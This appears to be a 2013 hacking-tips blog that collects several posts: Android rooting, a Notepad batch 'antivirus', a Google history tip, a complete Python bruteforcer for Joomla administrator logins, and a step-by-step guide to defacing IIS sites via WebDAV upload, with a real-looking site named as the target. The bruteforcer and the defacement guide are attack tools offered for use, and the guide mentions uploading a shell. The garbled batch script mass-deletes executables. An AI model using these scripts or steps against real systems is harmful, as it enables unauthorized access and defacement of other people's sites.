Pages

Wednesday 18 December 2013

Root ANDROID devices (steps included)

Rooting your android phone means of unlocking the operating system so you can install unapproved Google apps, update your OS, replace the firmware, overclock (or underclock) the processor, customize just about anything, and so on.
For the Limited user of the Android Phone, it must be too Scary process. After all, "rooting" around in your smartphone's core software might seem like a recipe for disaster. One wrong move and you could end up with bricked handset.
But, thankfully we have the great windows utility Kingo Android Root. Which Enables us to Root your android phones With just One-click.

Before we get starts you need to Download the Following Tool(s).
So here your Step by Step Guides Starts :
  • Install Kingo Android Root.
  • Enable USB Debugging (Setting > About >  Developer Options)
  • Run the Kingo Android Root and Connect you Phone to your Computer (via USB). After a moment, the former will show a connection to the latter.
Click to enlarge
  • Click Root and Wait for processing to be Finish.All the Process will all take about about two minutes, including the automated reboot at the end.
After Rooting your Android Phone, If you Don't like the Change you can go all the way back and Click Unroot form the Same place where you have Rooted your Phone.

Any suggestions...please comment...

Create your own Antivirus Codings

There are simple ways to clean viruses in our computers. We can make your own antivirus with software built using the Windows named Notepad. Apart from minor product files, notepad can save files to a variety of other applications programs, such as html, java script and so on.

However, the virus that can be eliminated by our anti-virus is only a low level as macro viruses and an equal. For heavy virus, would have to use anti-virus that is more powerful. However, these tutorials can teach you the basic knowledge about how the anti-virus.

Type the following code into Notepad:

@ echo off
echo off turn off the active virus
taskkill / F / IM virusname1.exe / IM virusname2.exe
echo Deleting all of viruses based on size
for / RC: \%% a in (*. exe) do if%% ~ za 157,184 equ del / A: HSRA "%% a"
echo deleting hidden virus
echo for drive c and subfolders
for / R C: \%% a in (*. doc.exe) do del "%% a"
echo for drive d and subfolders
for / R D: \%% a in (*. doc.exe) do del "%% a"
echo Unhide Document
cd / d c: \
echo for drive C and subfolders
*. doc attrib-H-S-A / S
cd / d d: \
echo for drive D and subfolders
*. doc attrib-H-S-A / S
exit


Save the file with bat extension, For example antivirus.bat. then go to command prompt and run the Notepad file.

Saturday 14 December 2013

Gets escape from Tracking of Google


 In this internet world google is the great position on Search Engine service, at the same time it also tracks our all activity. Even if you delete your Web Browser history you can’t get escape from the google tracking. 
But now we have a solution to get escape from this tracking.

Now you can see all your browsed histories, to delete them all just click “Remove All Web History”
That’s it. Now google can’t able to track you.. 
 I hope you like this post, Any suggestions please comment.. Thank You...

Saturday 7 December 2013

Administration Login Bruteforce [Python] Codings....



It is a successful bruteforcer of Joomla Administration Panel, coded in Python.



SCRIPT : -



#!/usr/bin/python
# Joomla Administrator Login BruteForcer for v1.0 and v1.5


import urllib, sys, re, os, socket, httplib, urllib2, time

#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
        SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
        SysCls = 'cls'
else:
        SysCls = 'unknown'

#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
        print "\n|----------------------------------------------|"
        print "| rsauron[@]gmail[dot]com                v1.0  |"
        print "|   7/2008      joomlabrute.py                 |"
        print "|    - Joomla Administrator Panel BruteForcer  |"
        print "| Usage: joomlabrute.py [options]              |"
        print "|                       -h help   darkc0de.com |"
        print "|----------------------------------------------|\n"
        sys.exit(1)

#define varablies
site = ""
dbt = "joomlabrutelog.txt"
proxy = "None"
arg_words = ""
arg_user = "admin"
arg_verbose = "None"
count = 0
gets = 0

#help option
for arg in sys.argv:
        if arg == "-h":
                print "\n   Usage: ./joomlabrute.py [options]        rsauron[@]gmail[dot]com darkc0de.com"
                print "\n\tRequired:"
                print "\tDefine: -u       www.site.com/administrator/"
                print "\tDefine: -w       words.txt"
                print "\n\tOptional:"
                print "\tDefine: -user    \"jorge\"                        Default:admin"
                print "\tDefine: -p       \"127.0.0.1:80 or proxy.txt\""
                print "\tDefine: -o       \"ouput_file_name.txt\"          Default:joomlabrutelog.txt"
                print "\tDefine: -v       Verbose Mode"
                print "\n   Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -v -o site.txt"
                print "   Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -user jorge -p 127.0.0.1:8080\n"
                sys.exit(1)

#Check args
for arg in sys.argv:
        if arg == "-u":
                site = sys.argv[count+1]
        elif arg == "-o":
                dbt = sys.argv[count+1]
        elif arg == "-p":
                proxy = sys.argv[count+1]
        elif arg == "-w":
                arg_words = sys.argv[count+1]
        elif arg == "-user":
                arg_user = sys.argv[count+1]
        elif arg == "-v":
                arg_verbose = sys.argv  
        count+=1

#Title write
file = open(dbt, "a")
print "\n|----------------------------------------------|"
print "| rsauron[@]gmail[dot]com                v1.0  |"
print "|   7/2008      joomlabrute.py                 |"
print "|    - Joomla Administrator Panel BruteForcer  |"
print "| Usage: joomlabrute.py [options]              |"
print "|                       -h help   darkc0de.com |"
print "|----------------------------------------------|"
file.write("\n\n|----------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com                v1.0  |")
file.write("\n|   7/2008      joomlabrute.py                 |")
file.write("\n|    - Joomla Administrator Panel BruteForcer  |")
file.write("\n| Usage: joomlabrute.py [options]              |")
file.write("\n|                       -h help   darkc0de.com |")
file.write("\n|----------------------------------------------|\n")

#Arg Error Checking
if site == "":
        print "[-] Must include -u flag."
        print "[-] For help -h\n"
        sys.exit(1)
if arg_words == "":
        print "[-] Must include -w flag."
        print "[-] For help -h\n"
        sys.exit(1)
if proxy != "None":
        if len(proxy.split(".")) == 2:
                proxy = open(proxy, "r").read()
        if proxy.endswith("\n"):
                proxy = proxy.rstrip("\n")
        proxy = proxy.split("\n")
if site[:7] != "http://": 
        site = "http://"+site

#Build proxy list
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
        
        file.write("[+] Building Proxy List...")
        print "[+] Building Proxy List..."
        for p in proxy:
                try:
                    proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                    opener = urllib2.build_opener(proxy_handler)
                    opener.open("http://www.google.com")
                    opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                    proxy_list.append(opener)
                    file.write("\n\tProxy:"+p+"- Success")
                    print "\tProxy:",p,"- Success"
                except:
                    file.write("\n\tProxy:"+p+"- Failed")
                    print "\tProxy:",p,"- Failed"
                    pass
        if len(proxy_list) == 0:
                print "[-] All proxies have failed. App Exiting"
                file.write("\n[-] All proxies have failed. App Exiting\n")
                sys.exit(1) 
        print "[+] Proxy List Complete"
        file.write("[+] Proxy List Complete")
else:
    print "[-] Proxy Not Given"
    file.write("[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener())
proxy_num = 0
proxy_len = len(proxy_list)

#here we go
print "[+] BruteForcing:",site
print "[+] Username:",arg_user
file.write("\n[+] BruteForcing:"+str(site))
file.write("\n[+] Username:"+str(arg_user))
try:
        words = open(arg_words, "r").readlines()
        print "[+] Words Loaded:",len(words)
        words_len = len(words)
        file.write("\n[+] Words Loaded: "+str(words_len))
except(IOError): 
        print "[-] Error: Check your wordlist path\n"
        sys.exit(1)
print "[+] [%s]" % time.strftime("%X")
file.write("\n[+] [%s]" % time.strftime("%X"))
for word in words:
        word = word.replace("\r","").replace("\n","")
        login_form_seq = [
        ('usrname', arg_user),
        ('pass', word),
        ('submit', 'Login')]
        login_form_data = urllib.urlencode(login_form_seq)
        while 1:
                try:
                        gets+=1
                        proxy_num+=1
                        site_get = proxy_list[proxy_num % proxy_len].open(site, login_form_data).read()
                        break
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        pass
        #See where it says Username... change this to whatever your getting back on a incorrect login
        if re.search("Username",site_get) == None:
                print "\n\t[!] Login Successfull:",arg_user+":"+word
                file.write("\n\n\t[!] Login Successfull: "+str(arg_user)+":"+str(word))
                break
        else:
                if arg_verbose != "None":
                        print "[-] Login Failed:",word
                        file.write("\n[-] Login Failed:"+str(word))

#Lets wrap it up!
print "\n[-] [%s]" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()


SCRIPT ENDS...
Note: This is only for Educational Purpose

Friday 6 December 2013

Hack a website with Iss exploit with Win XP




In IIS Exploit we can upload the Defaced page on the Vulnerable Server without any Login. It is most Easiest  way to Hack any site.

STEP 1: Click on Start button and open "RUN".



STEP 2: Now Type  this in RUN
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

Now A Folder named "Web Folders" will open.


STEP 3: Now "Right-Click" in the folder and Goto "New" and then "Web Folder".


STEP 4: Now type the name of the Vulnerable site in this. e.g." http://autoqingdao.com/ " and click "Next".


STEP 5: Now Click on "Finish"


STEP 6: Now the folder will appear. You can open it and put any deface page or anything.


STEP 7: I put  text file in that folder. Named "securityalert.txt" (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don't then the site is not Vulnerable.



Now to view the uploaded site i will go to "http://autoqingdao.com/securityalert.txt"
In your case it will be " www.[sitename].com/[file name that you uploaded] "